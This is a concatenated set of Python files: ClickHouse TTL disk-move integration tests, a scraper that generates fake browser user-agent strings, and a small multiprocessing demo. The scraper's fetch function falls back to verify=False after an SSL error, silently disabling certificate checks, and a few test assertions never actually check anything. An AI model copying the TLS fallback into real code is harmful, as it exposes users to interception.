d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
PARTITION BY p1
TTL d1 TO VOLUME 'external'
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
node1.query("SYSTEM STOP MOVES {name}".format(name=name))
for p in range(2):
data = [] # 20MB in total
for i in range(10):
data.append((str(p), "'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(
time.time() - 1 if i > 0 or positive else time.time() + 300))) # 1MB row
node1.query(
"INSERT INTO {} (p1, s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"external" if positive else "jbod1"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "20"
finally:
node1.query("DROP TABLE IF EXISTS {} NO DELAY".format(name))
@pytest.mark.parametrize("name,engine", [
("mt_test_moves_to_disk_eventually_work", "MergeTree()"),
("replicated_mt_test_moves_to_disk_eventually_work",
"ReplicatedMergeTree('/clickhouse/replicated_test_moves_to_disk_eventually_work', '1')"),
])
def test_moves_to_disk_eventually_work(started_cluster, name, engine):
try:
name_temp = name + "_temp"
node1.query("""
CREATE TABLE {name} (
s1 String
) ENGINE = MergeTree()
ORDER BY tuple()
SETTINGS storage_policy='only_jbod2'
""".format(name=name_temp))
data = [] # 35MB in total
for i in range(35):
data.append(get_random_string(1024 * 1024)) # 1MB row
node1.query("INSERT INTO {} VALUES {}".format(name_temp, ",".join(["('" + x + "')" for x in data])))
used_disks = get_used_disks_for_table(node1, name_temp)
assert set(used_disks) == {"jbod2"}
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'jbod2'
SETTINGS storage_policy='jbod1_with_jbod2'
""".format(name=name, engine=engine))
data = [] # 10MB in total
for i in range(10):
data.append(
("'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time.time() - 1))) # 1MB row
node1.query("INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"}
node1.query("DROP TABLE {} NO DELAY".format(name_temp))
time.sleep(2)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod2"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "10"
finally:
node1.query("DROP TABLE IF EXISTS {} NO DELAY".format(name_temp))
node1.query("DROP TABLE IF EXISTS {} NO DELAY".format(name))
def test_replicated_download_ttl_info(started_cluster):
name = "test_replicated_ttl_info"
engine = "ReplicatedMergeTree('/clickhouse/test_replicated_download_ttl_info', '{replica}')"
try:
for i, node in enumerate((node1, node2), start=1):
node.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'external'
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
node1.query("SYSTEM STOP MOVES {}".format(name))
node2.query("INSERT INTO {} (s1, d1) VALUES ('{}', toDateTime({}))".format(name, get_random_string(1024 * 1024),
time.time() - 100))
assert set(get_used_disks_for_table(node2, name)) == {"external"}
time.sleep(1)
assert node1.query("SELECT count() FROM {}".format(name)).splitlines() == ["1"]
assert set(get_used_disks_for_table(node1, name)) == {"external"}
finally:
for node in (node1, node2):
try:
node.query("DROP TABLE IF EXISTS {} NO DELAY".format(name))
except:
continue
@pytest.mark.parametrize("name,engine,positive", [
("mt_test_merges_to_disk_do_not_work", "MergeTree()", 0),
("replicated_mt_test_merges_to_disk_do_not_work",
"ReplicatedMergeTree('/clickhouse/replicated_test_merges_to_disk_do_not_work', '1')", 0),
("mt_test_merges_to_disk_work", "MergeTree()", 1),
("replicated_mt_test_merges_to_disk_work",
"ReplicatedMergeTree('/clickhouse/replicated_test_merges_to_disk_work', '1')", 1),
])
def test_merges_to_disk_work(started_cluster, name, engine, positive):
try:
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'external'
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
node1.query("SYSTEM STOP MERGES {}".format(name))
node1.query("SYSTEM STOP MOVES {}".format(name))
wait_expire_1 = 16
wait_expire_2 = 4
time_1 = time.time() + wait_expire_1
time_2 = time.time() + wait_expire_1 + wait_expire_2
wait_expire_1_thread = threading.Thread(target=time.sleep, args=(wait_expire_1,))
wait_expire_1_thread.start()
for _ in range(2):
data = [] # 16MB in total
for i in range(8):
data.append(("'{}'".format(get_random_string(1024 * 1024)),
"toDateTime({})".format(time_1 if i > 0 or positive else time_2))) # 1MB row
node1.query(
"INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"}
assert "2" == node1.query(
"SELECT count() FROM system.parts WHERE table = '{}' AND active = 1".format(name)).strip()
wait_expire_1_thread.join()
time.sleep(wait_expire_2 / 2)
node1.query("SYSTEM START MERGES {}".format(name))
node1.query("OPTIMIZE TABLE {}".format(name))
time.sleep(1)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"external" if positive else "jbod1"}
assert "1" == node1.query(
"SELECT count() FROM system.parts WHERE table = '{}' AND active = 1".format(name)).strip()
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "16"
finally:
node1.query("DROP TABLE IF EXISTS {} NO DELAY".format(name))
@pytest.mark.parametrize("name,engine", [
("mt_test_merges_with_full_disk_work", "MergeTree()"),
("replicated_mt_test_merges_with_full_disk_work",
"ReplicatedMergeTree('/clickhouse/replicated_test_merges_with_full_disk_work', '1')"),
])
def test_merges_with_full_disk_work(started_cluster, name, engine):
try:
name_temp = name + "_temp"
node1.query("""
CREATE TABLE {name} (
s1 String
) ENGINE = MergeTree()
ORDER BY tuple()
SETTINGS storage_policy='only_jbod2'
""".format(name=name_temp))
data = [] # 35MB in total
for i in range(35):
data.append(get_random_string(1024 * 1024)) # 1MB row
node1.query("INSERT INTO {} VALUES {}".format(name_temp, ",".join(["('" + x + "')" for x in data])))
used_disks = get_used_disks_for_table(node1, name_temp)
assert set(used_disks) == {"jbod2"}
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'jbod2'
SETTINGS storage_policy='jbod1_with_jbod2'
""".format(name=name, engine=engine))
wait_expire_1 = 10
time_1 = time.time() + wait_expire_1
wait_expire_1_thread = threading.Thread(target=time.sleep, args=(wait_expire_1,))
wait_expire_1_thread.start()
for _ in range(2):
data = [] # 12MB in total
for i in range(6):
data.append(("'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time_1))) # 1MB row
node1.query(
"INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"}
assert "2" == node1.query(
"SELECT count() FROM system.parts WHERE table = '{}' AND active = 1".format(name)).strip()
wait_expire_1_thread.join()
node1.query("OPTIMIZE TABLE {}".format(name))
time.sleep(1)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"} # Merged to the same disk against the rule.
assert "1" == node1.query(
"SELECT count() FROM system.parts WHERE table = '{}' AND active = 1".format(name)).strip()
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "12"
finally:
node1.query("DROP TABLE IF EXISTS {} NO DELAY".format(name_temp))
node1.query("DROP TABLE IF EXISTS {} NO DELAY".format(name))
@pytest.mark.parametrize("name,engine,positive", [
("mt_test_moves_after_merges_do_not_work", "MergeTree()", 0),
("replicated_mt_test_moves_after_merges_do_not_work",
"ReplicatedMergeTree('/clickhouse/replicated_test_moves_after_merges_do_not_work', '1')", 0),
("mt_test_moves_after_merges_work", "MergeTree()", 1),
("replicated_mt_test_moves_after_merges_work",
"ReplicatedMergeTree('/clickhouse/replicated_test_moves_after_merges_work', '1')", 1),
])
def test_moves_after_merges_work(started_cluster, name, engine, positive):
try:
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'external'
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
wait_expire_1 = 16
wait_expire_2 = 4
time_1 = time.time() + wait_expire_1
time_2 = time.time() + wait_expire_1 + wait_expire_2
wait_expire_1_thread = threading.Thread(target=time.sleep, args=(wait_expire_1,))
wait_expire_1_thread.start()
for _ in range(2):
data = [] # 14MB in total
for i in range(7):
data.append(("'{}'".format(get_random_string(1024 * 1024)),
"toDateTime({})".format(time_1 if i > 0 or positive else time_2))) # 1MB row
node1.query(
"INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
node1.query("OPTIMIZE TABLE {}".format(name))
time.sleep(1)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"}
assert "1" == node1.query(
"SELECT count() FROM system.parts WHERE table = '{}' AND active = 1".format(name)).strip()
wait_expire_1_thread.join()
time.sleep(wait_expire_2 / 2)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"external" if positive else "jbod1"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "14"
finally:
node1.query("DROP TABLE IF EXISTS {} NO DELAY".format(name))
@pytest.mark.parametrize("name,engine,positive,bar", [
("mt_test_moves_after_alter_do_not_work", "MergeTree()", 0, "DELETE"),
("replicated_mt_test_moves_after_alter_do_not_work",
"ReplicatedMergeTree('/clickhouse/replicated_test_moves_after_alter_do_not_work', '1')", 0, "DELETE"),
("mt_test_moves_after_alter_work", "MergeTree()", 1, "DELETE"),
("replicated_mt_test_moves_after_alter_work",
"ReplicatedMergeTree('/clickhouse/replicated_test_moves_after_alter_work', '1')", 1, "DELETE"),
("mt_test_moves_after_alter_do_not_work", "MergeTree()", 0, "TO DISK 'external'"),
("replicated_mt_test_moves_after_alter_do_not_work",
"ReplicatedMergeTree('/clickhouse/replicated_test_moves_after_alter_do_not_work', '1')", 0, "TO DISK 'external'"),
("mt_test_moves_after_alter_work", "MergeTree()", 1, "TO DISK 'external'"),
("replicated_mt_test_moves_after_alter_work",
"ReplicatedMergeTree('/clickhouse/replicated_test_moves_after_alter_work', '1')", 1, "TO DISK 'external'"),
])
def test_ttls_do_not_work_after_alter(started_cluster, name, engine, positive, bar):
try:
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'external'
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
if positive:
node1.query("""
ALTER TABLE {name}
MODIFY TTL
d1 + INTERVAL 15 MINUTE {bar}
""".format(name=name, bar=bar)) # That shall disable TTL.
data = [] # 10MB in total
for i in range(10):
data.append(
("'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time.time() - 1))) # 1MB row
node1.query("INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1" if positive else "external"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "10"
finally:
node1.query("DROP TABLE IF EXISTS {} NO DELAY".format(name))
@pytest.mark.parametrize("name,engine", [
("mt_test_materialize_ttl_in_partition", "MergeTree()"),
("replicated_mt_test_materialize_ttl_in_partition",
"ReplicatedMergeTree('/clickhouse/test_materialize_ttl_in_partition', '1')"),
])
def test_materialize_ttl_in_partition(started_cluster, name, engine):
try:
node1.query("""
CREATE TABLE {name} (
p1 Int8,
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY p1
PARTITION BY p1
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
data = [] # 5MB in total
for i in range(5):
data.append((str(i), "'{}'".format(get_random_string(1024 * 1024)),
"toDateTime({})".format(time.time() - 1))) # 1MB row
node1.query(
"INSERT INTO {} (p1, s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
time.sleep(0.5)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"}
node1.query("""
ALTER TABLE {name}
MODIFY TTL
d1 TO DISK 'external' SETTINGS materialize_ttl_after_modify = 0
""".format(name=name))
time.sleep(0.5)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"}
node1.query("""
ALTER TABLE {name}
MATERIALIZE TTL IN PARTITION 2
""".format(name=name))
node1.query("""
ALTER TABLE {name}
MATERIALIZE TTL IN PARTITION 4
""".format(name=name))
time.sleep(0.5)
used_disks_sets = []
for i in range(len(data)):
used_disks_sets.append(set(get_used_disks_for_table(node1, name, partition=i)))
assert used_disks_sets == [{"jbod1"}, {"jbod1"}, {"external"}, {"jbod1"}, {"external"}]
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == str(len(data))
finally:
node1.query("DROP TABLE IF EXISTS {} NO DELAY".format(name))
@pytest.mark.parametrize("name,engine,positive", [
("mt_test_alter_multiple_ttls_positive", "MergeTree()", True),
("mt_replicated_test_alter_multiple_ttls_positive",
"ReplicatedMergeTree('/clickhouse/replicated_test_alter_multiple_ttls_positive', '1')", True),
("mt_test_alter_multiple_ttls_negative", "MergeTree()", False),
("mt_replicated_test_alter_multiple_ttls_negative",
"ReplicatedMergeTree('/clickhouse/replicated_test_alter_multiple_ttls_negative', '1')", False),
])
def test_alter_multiple_ttls(started_cluster, name, engine, positive):
"""Copyright 2019, Altinity LTD
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License."""
"""Check that when multiple TTL expressions are set
and before any parts are inserted the TTL expressions
are changed with ALTER command then all old
TTL expressions are removed and the
the parts are moved to the specified disk or volume or
deleted if the new TTL expression is triggered
and are not moved or deleted when it is not.
"""
now = time.time()
try:
node1.query("""
CREATE TABLE {name} (
p1 Int64,
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
PARTITION BY p1
TTL d1 + INTERVAL 34 SECOND TO DISK 'jbod2',
d1 + INTERVAL 64 SECOND TO VOLUME 'external'
SETTINGS storage_policy='jbods_with_external', merge_with_ttl_timeout=0
""".format(name=name, engine=engine))
node1.query("""
ALTER TABLE {name} MODIFY
TTL d1 + INTERVAL 0 SECOND TO DISK 'jbod2',
d1 + INTERVAL 14 SECOND TO VOLUME 'external',
d1 + INTERVAL 19 SECOND DELETE
""".format(name=name))
for p in range(3):
data = [] # 6MB in total
now = time.time()
for i in range(2):
p1 = p
s1 = get_random_string(1024 * 1024) # 1MB
d1 = now - 1 if i > 0 or positive else now + 300
data.append("({}, '{}', toDateTime({}))".format(p1, s1, d1))
node1.query("INSERT INTO {name} (p1, s1, d1) VALUES {values}".format(name=name, values=",".join(data)))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod2"} if positive else {"jbod1", "jbod2"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).splitlines() == ["6"]
if positive:
expected_disks = {"external"}
else:
expected_disks = {"jbod1", "jbod2"}
check_used_disks_with_retry(node1, name, expected_disks, 50)
assert node1.query("SELECT count() FROM {name}".format(name=name)).splitlines() == ["6"]
time.sleep(5)
for i in range(50):
rows_count = int(node1.query("SELECT count() FROM {name}".format(name=name)).strip())
if positive:
if rows_count == 0:
break
else:
if rows_count == 3:
break
node1.query("OPTIMIZE TABLE {name} FINAL".format(name=name))
time.sleep(0.5)
if positive:
assert rows_count == 0
else:
assert rows_count == 3
finally:
node1.query("DROP TABLE IF EXISTS {name} NO DELAY".format(name=name))
@pytest.mark.parametrize("name,engine", [
("concurrently_altering_ttl_mt", "MergeTree()"),
("concurrently_altering_ttl_replicated_mt",
"ReplicatedMergeTree('/clickhouse/concurrently_altering_ttl_replicated_mt', '1')",),
])
def test_concurrent_alter_with_ttl_move(started_cluster, name, engine):
try:
node1.query("""
CREATE TABLE {name} (
EventDate Date,
number UInt64
) ENGINE = {engine}
ORDER BY tuple()
PARTITION BY toYYYYMM(EventDate)
SETTINGS storage_policy='jbods_with_external'
""".format(name=name, engine=engine))
values = list({random.randint(1, 1000000) for _ in range(0, 1000)})
def insert(num):
for i in range(num):
day = random.randint(11, 30)
value = values.pop()
month = '0' + str(random.choice([3, 4]))
node1.query("INSERT INTO {} VALUES(toDate('2019-{m}-{d}'), {v})".format(name, m=month, d=day, v=value))
def alter_move(num):
def produce_alter_move(node, name):
move_type = random.choice(["PART", "PARTITION"])
if move_type == "PART":
for _ in range(10):
try:
parts = node1.query(
"SELECT name from system.parts where table = '{}' and active = 1".format(
name)).strip().split('\n')
break
except QueryRuntimeException:
pass
else:
raise Exception("Cannot select from system.parts")
move_part = random.choice(["'" + part + "'" for part in parts])
else:
move_part = random.choice([201903, 201904])
move_disk = random.choice(["DISK", "VOLUME"])
if move_disk == "DISK":
move_volume = random.choice(["'external'", "'jbod1'", "'jbod2'"])
else:
move_volume = random.choice(["'main'", "'external'"])
try:
node1.query("ALTER TABLE {} MOVE {mt} {mp} TO {md} {mv}".format(
name, mt=move_type, mp=move_part, md=move_disk, mv=move_volume))
except QueryRuntimeException:
pass
for i in range(num):
produce_alter_move(node1, name)
def alter_update(num):
for i in range(num):
node1.query("ALTER TABLE {} UPDATE number = number + 1 WHERE 1".format(name))
def alter_modify_ttl(num):
for i in range(num):
ttls = []
for j in range(random.randint(1, 10)):
what = random.choice(
["TO VOLUME 'main'", "TO VOLUME 'external'", "TO DISK 'jbod1'", "TO DISK 'jbod2'",
"TO DISK 'external'"])
when = "now()+{}".format(random.randint(-1, 5))
ttls.append("{} {}".format(when, what))
try:
node1.query("ALTER TABLE {} MODIFY TTL {}".format(name, ", ".join(ttls)))
except QueryRuntimeException:
pass
def optimize_table(num):
for i in range(num):
try: # optimize may throw after concurrent alter
node1.query("OPTIMIZE TABLE {} FINAL".format(name), settings={'optimize_throw_if_noop': '1'})
break
except:
pass
p = Pool(15)
tasks = []
for i in range(5):
tasks.append(p.apply_async(insert, (100,)))
tasks.append(p.apply_async(alter_move, (100,)))
tasks.append(p.apply_async(alter_update, (100,)))
tasks.append(p.apply_async(alter_modify_ttl, (100,)))
tasks.append(p.apply_async(optimize_table, (100,)))
for task in tasks:
task.get(timeout=120)
assert node1.query("SELECT 1") == "1\n"
assert node1.query("SELECT COUNT() FROM {}".format(name)) == "500\n"
finally:
node1.query("DROP TABLE IF EXISTS {name} NO DELAY".format(name=name))
@pytest.mark.skip(reason="Flacky test")
@pytest.mark.parametrize("name,positive", [
("test_double_move_while_select_negative", 0),
("test_double_move_while_select_positive", 1),
])
def test_double_move_while_select(started_cluster, name, positive):
try:
node1.query("""
CREATE TABLE {name} (
n Int64,
s String
) ENGINE = MergeTree
ORDER BY tuple()
PARTITION BY n
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name))
node1.query(
"INSERT INTO {name} VALUES (1, '{string}')".format(name=name, string=get_random_string(10 * 1024 * 1024)))
parts = node1.query(
"SELECT name FROM system.parts WHERE table = '{name}' AND active = 1".format(name=name)).splitlines()
assert len(parts) == 1
node1.query("ALTER TABLE {name} MOVE PART '{part}' TO DISK 'external'".format(name=name, part=parts[0]))
def long_select():
if positive:
node1.query("SELECT sleep(3), sleep(2), sleep(1), n FROM {name}".format(name=name))
thread = threading.Thread(target=long_select)
thread.start()
time.sleep(1)
node1.query("ALTER TABLE {name} MOVE PART '{part}' TO DISK 'jbod1'".format(name=name, part=parts[0]))
# Fill jbod1 to force ClickHouse to make move of partition 1 to external.
node1.query(
"INSERT INTO {name} VALUES (2, '{string}')".format(name=name, string=get_random_string(9 * 1024 * 1024)))
node1.query(
"INSERT INTO {name} VALUES (3, '{string}')".format(name=name, string=get_random_string(9 * 1024 * 1024)))
node1.query(
"INSERT INTO {name} VALUES (4, '{string}')".format(name=name, string=get_random_string(9 * 1024 * 1024)))
time.sleep(1)
# If SELECT locked old part on external, move shall fail.
assert node1.query(
"SELECT disk_name FROM system.parts WHERE table = '{name}' AND active = 1 AND name = '{part}'"
.format(name=name, part=parts[0])).splitlines() == ["jbod1" if positive else "external"]
thread.join()
assert node1.query("SELECT n FROM {name} ORDER BY n".format(name=name)).splitlines() == ["1", "2", "3", "4"]
finally:
node1.query("DROP TABLE IF EXISTS {name} NO DELAY".format(name=name))
@pytest.mark.parametrize("name,engine,positive", [
("mt_test_alter_with_merge_do_not_work", "MergeTree()", 0),
("replicated_mt_test_alter_with_merge_do_not_work",
"ReplicatedMergeTree('/clickhouse/replicated_test_alter_with_merge_do_not_work', '1')", 0),
("mt_test_alter_with_merge_work", "MergeTree()", 1),
("replicated_mt_test_alter_with_merge_work",
"ReplicatedMergeTree('/clickhouse/replicated_test_alter_with_merge_work', '1')", 1),
])
def test_alter_with_merge_work(started_cluster, name, engine, positive):
"""Copyright 2019, Altinity LTD
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License."""
"""Check that TTL expressions are re-evaluated for
existing parts after ALTER command changes TTL expressions
and parts are merged.
"""
try:
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 + INTERVAL 3000 SECOND TO DISK 'jbod2',
d1 + INTERVAL 6000 SECOND TO VOLUME 'external'
SETTINGS storage_policy='jbods_with_external', merge_with_ttl_timeout=0
""".format(name=name, engine=engine))
def optimize_table(num):
for i in range(num):
try: # optimize may throw after concurrent alter
node1.query("OPTIMIZE TABLE {} FINAL".format(name), settings={'optimize_throw_if_noop': '1'})
break
except:
pass
for p in range(3):
data = [] # 6MB in total
now = time.time()
for i in range(2):
s1 = get_random_string(1024 * 1024) # 1MB
d1 = now - 1 if positive else now + 300
data.append("('{}', toDateTime({}))".format(s1, d1))
values = ",".join(data)
node1.query("INSERT INTO {name} (s1, d1) VALUES {values}".format(name=name, values=values))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1", "jbod2"}
node1.query("SELECT count() FROM {name}".format(name=name)).splitlines() == ["6"]
node1.query("""
ALTER TABLE {name} MODIFY
TTL d1 + INTERVAL 0 SECOND TO DISK 'jbod2',
d1 + INTERVAL 5 SECOND TO VOLUME 'external',
d1 + INTERVAL 10 SECOND DELETE
""".format(name=name))
optimize_table(20)
assert node1.query(
"SELECT count() FROM system.parts WHERE table = '{name}' AND active = 1".format(name=name)) == "1\n"
time.sleep(5)
optimize_table(20)
if positive:
assert check_used_disks_with_retry(node1, name, set(["external"]), 50)
else:
assert check_used_disks_with_retry(node1, name, set(["jbod1", "jbod2"]), 50)
time.sleep(5)
optimize_table(20)
if positive:
assert node1.query("SELECT count() FROM {name}".format(name=name)) == "0\n"
else:
assert node1.query("SELECT count() FROM {name}".format(name=name)) == "6\n"
finally:
node1.query("DROP TABLE IF EXISTS {name} NO DELAY".format(name=name))
@pytest.mark.parametrize("name,dest_type,engine", [
("mt_test_disabled_ttl_move_on_insert_work", "DISK", "MergeTree()"),
("mt_test_disabled_ttl_move_on_insert_work", "VOLUME", "MergeTree()"),
("replicated_mt_test_disabled_ttl_move_on_insert_work", "DISK", "ReplicatedMergeTree('/clickhouse/replicated_test_disabled_ttl_move_on_insert_work', '1')"),
("replicated_mt_test_disabled_ttl_move_on_insert_work", "VOLUME", "ReplicatedMergeTree('/clickhouse/replicated_test_disabled_ttl_move_on_insert_work', '1')"),
])
def test_disabled_ttl_move_on_insert(started_cluster, name, dest_type, engine):
try:
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO {dest_type} 'external'
SETTINGS storage_policy='jbod_without_instant_ttl_move'
""".format(name=name, dest_type=dest_type, engine=engine))
node1.query("SYSTEM STOP MOVES {}".format(name))
data = [] # 10MB in total
for i in range(10):
data.append(("'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(
time.time() - 1))) # 1MB row
node1.query("INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "10"
node1.query("SYSTEM START MOVES {}".format(name))
time.sleep(3)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"external"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "10"
finally:
try:
node1.query("DROP TABLE IF EXISTS {} NO DELAY".format(name))
except:
pass
|
thread_version.py
|
"""Generate fake useragent using threading. This is only for offering another solution. Not actually called in the published pkg"""
import os
# import sys
import json
import random
from time import sleep
import concurrent.futures
from threading import Thread
import requests
from requests import exceptions
from urllib.parse import quote_plus
from collections import defaultdict
from lxml import etree
# sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
all_versions = defaultdict(list)
def fetch(url):
attempt = 0
while True:
with requests.Session() as s:
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.62 Safari/537.36"
}
s.headers.update(headers)
if attempt == settings.HTTP_RETRIES:
raise FakeUserAgentError("Maximum amount of retries reached")
            # Count the attempt up front so persistent timeouts and connection
            # errors still advance towards the retry cap.
            attempt += 1
            try:
                r = s.get(url, timeout=settings.HTTP_TIMEOUT)
except exceptions.SSLError:
r = s.get(url, timeout=settings.HTTP_TIMEOUT, verify=False)
return r.text
except exceptions.ConnectTimeout:
logger.error("Timed out during fetching %s. Retrying...", url)
sleep(settings.HTTP_DELAY)
except requests.exceptions.ConnectionError:
logger.error("%s terminated connection. Retrying...", url)
sleep(settings.HTTP_DELAY)
except Exception:
logger.exception("Error occurred during fetching %s", url)
else:
return r.text
def parse(browser):
html_str = fetch(settings.BROWSER_BASE_PAGE.format(browser=quote_plus(browser)))
if html_str:
lxml_element = etree.HTML(html_str)
versions = lxml_element.xpath('//*[@id="liste"]/ul/li/a/text()')[
: settings.BROWSERS_COUNT_LIMIT
]
all_versions[browser].extend(versions)
def load():
threads = [
Thread(target=parse, args=(browser,)) for browser in settings.BROWSERS.keys()
]
for t in threads:
t.start()
for t in threads:
t.join()
# NOTE: thread-pool version of load(); not actually used.
def load_by_threadpool(use_cache_server=True):
all_versions = {}
    # Without an explicit max_workers, the executor has to compute a default, which is slower.
with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:
future_to_browser = {
executor.submit(get_browser_versions, browser): browser
for browser in settings.BROWSERS.keys()
}
for future in concurrent.futures.as_completed(future_to_browser):
browser = future_to_browser[future]
data = future.result()
all_versions[browser] = data
return all_versions
def write(path, data):
rm_tempfile()
global TEMP_FILE
with open(path, encoding="utf-8", mode="wt") as f:
dumped = json.dumps(data)
f.write(dumped)
TEMP_FILE = settings.TEMP_FILE
def read(path):
with open(path, encoding="utf-8", mode="rt") as f:
data = f.read()
return json.loads(data)
def rm_tempfile():
global TEMP_FILE
if TEMP_FILE:
for i in TEMP_FILE:
os.remove(i)
TEMP_FILE = []
else:
return
def random_choose(browser, data):
if browser:
return random.choice(data[browser])
else:
browser = random.choices(
list(settings.BROWSERS.keys()),
weights=list(settings.BROWSERS.values()),
k=1,
)[0]
return random.choice(data[browser])
def user_agent(browser=None, use_tempfile=True):
if browser:
if not isinstance(browser, str):
raise FakeUserAgentError("Please input a valid browser name")
browser = browser.strip().lower()
browser = settings.SHORTCUTS.get(browser, browser)
if browser not in list(settings.BROWSERS.keys()):
raise FakeUserAgentError("This browser is not supported.")
if TEMP_FILE:
data = read(TEMP_FILE[-1])
return random_choose(browser, data)
else:
load()
if use_tempfile:
write(settings.DB, all_versions)
return random_choose(browser, all_versions)
if __name__ == "__main__":
import settings
from log import logger
from errors import FakeUserAgentError
from parse import get_browser_input
    TEMP_FILE = settings.TEMP_FILE  # TEMP_FILE is a list
browser = get_browser_input()
print(user_agent(browser=browser, use_tempfile=True))
else:
from fake_user_agent import settings
from fake_user_agent.log import logger
from fake_user_agent.errors import FakeUserAgentError
    TEMP_FILE = settings.TEMP_FILE  # TEMP_FILE is a list
|
terminate.py
|
from multiprocessing import Process
import time
def myWorker():
t1 = time.time()
print(f'Process started at: {t1}')
time.sleep(5)
myProcess = Process(target=myWorker)
print(f'Process {myProcess}')
myProcess.start()
print('Terminating Process...')
myProcess.terminate()
myProcess.join()
print(f'Process Terminated: {myProcess}')
'''
Process <Process name='Process-1' parent=84197 initial>
Terminating Process...
Process Terminated: <Process name='Process-1' pid=84207 parent=84197 stopped exitcode=-SIGTERM>
'''
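# NOTE: on platforms that use the "spawn" start method (Windows, and macOS on
# Python 3.8+), module-level Process creation like the above must be guarded,
# roughly as sketched below, or the child's re-import of this module will fail:
#
#     if __name__ == '__main__':
#         myProcess = Process(target=myWorker)
#         myProcess.start()
#         myProcess.terminate()
#         myProcess.join()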
|
main.py
|
#*******************************************************************************
# NAME OF THE PROJECT: main.py
